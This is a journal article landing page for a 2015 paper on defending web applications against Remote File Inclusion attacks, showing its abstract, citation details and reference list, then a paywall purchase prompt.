Defending Against Remote File InclusionAttacks on Web Applications

Bharti Nagpal*, Naresh Chauhan**, Nanhay Singh***
* Assistant Professor, Ambedkar Institute Of Advanced Communication Technology & Research, Delhi, India.
** Professor, YMCA University of Science & Technology, Haryana, India.
*** Assistant Professor, Ambedkar Institute Of Advanced Communication Technology & Research, Delhi, India.
Periodicity:June - August'2015
DOI : https://doi.org/10.26634/jit.4.3.3488

Abstract

Web applications are the fundamental pillars of today's world. Society depends on them for business and day to day tasks. Because of their extensive use, web applications are under constant attack by hackers that exploit their vulnerabilities to disrupt business and thus access confidential information. Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The attackers operate independently of one another with the goal of seeking exploitable vulnerabilities on the web. Different reasons were found for attack such as use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events. From observations, it is apparent that the detection and blocking of such attacks can be prevented by creating a blacklist of attack sources and a black list of URLs of remotely included malicious scripts. Remote file inclusion is a technique which is used to attack web applications mainly php applications from a remote server. RFI attacks are extremely dangerous as they allow a client to force a vulnerable application to run their own malicious code by including a reference pointer to code from a URL located on a remote server. When an application executes the malicious code it may lead to a backdoor exploit or technical information retrieval. Attackers attempt to remotely include these within the web applications. While the scripts are hosted at many locations, many of them are duplicates of each other, so the number of actual scripts that are used in the attacks are very small.

Keywords

Security, Exploit, Vulnerability, RFI Attack, File Inclusion

How to Cite this Article?

Nagpal, B., Chauhan, N., and Singh, N. (2015). Defending Against Remote File Inclusion Attacks on Web Applications. i-manager’s Journal on Information Technology, 4(3), 25-33. https://doi.org/10.26634/jit.4.3.3488

References

[1]. Hugo F. Gonz´alez Robledo. (2008). Types of hosts on a Remote File Inclusion(RFI) botnet. In International IEEE Conference on Electronics, Robotics and Automotive Mechanics,
[2]. Dennis Schwarz. (2009). “A Multi-Perspective View of PHP Remote File Include Attacks”. SANS Institute InfoSec Reading Room,
[3]. Or Katz. (2009). Detecting Remote File Inclusion Attack. Breach Security Inc.
[4]. Chris Snyder, Thomas Myer, and Michael Southwell. Preventing Remote Execution. Springer 59-79.
[5]. Imperva. (2011). Hacker Intelligence Initiative, Monthly Trend Report #1,
[6]. Ivan Ristic, ModSecurity Rule Writing Workshop”
[7]. Brad Wardman,Gaurang Shukla, (2009). Gary Warner. Identifying Vulnerable Websites by Analysis of Common Strings in Phishing URLs. IEEE.
[8]. Robert Moskovitch, Dima Stopel, Clint Feher, Nir Nissim, Yuval Elovici (2008). Unknown Malcode Detection via Text Categorization. IEEE.
[9]. Jun-Hyung Park, Minsoo Kim, Bong-Nam Noh, James B D Joshi. (2006). A Similarity based Technique for Detecting Malicious Executable files for Computer Forensics. IEEE.
[10]. Yuxin Meng, Lam-for Kwok. A (2011). Generic Scheme for the Construction of Contextual Signatures with Hash Function in Intrusion Detection. IEEE.
[11]. OWASP Top Ten Most Critical Web Applications Security vulnerabilities. Http://www.owasp.org
[12]. https://www.owasp.org/index.php/Top_10_2007- Malicious_File_Execution
If you have access to this article please login to view the article or kindly login to purchase the article

Purchase Instant Access

Single Article

North Americas,UK,
Middle East,Europe
India Rest of world
USD EUR INR USD-ROW
Online 15 15

Options for accessing this content:
  • If you would like institutional access to this content, please recommend the title to your librarian.
    Library Recommendation Form
  • If you already have i-manager's user account: Login above and proceed to purchase the article.
  • New Users: Please register, then proceed to purchase the article.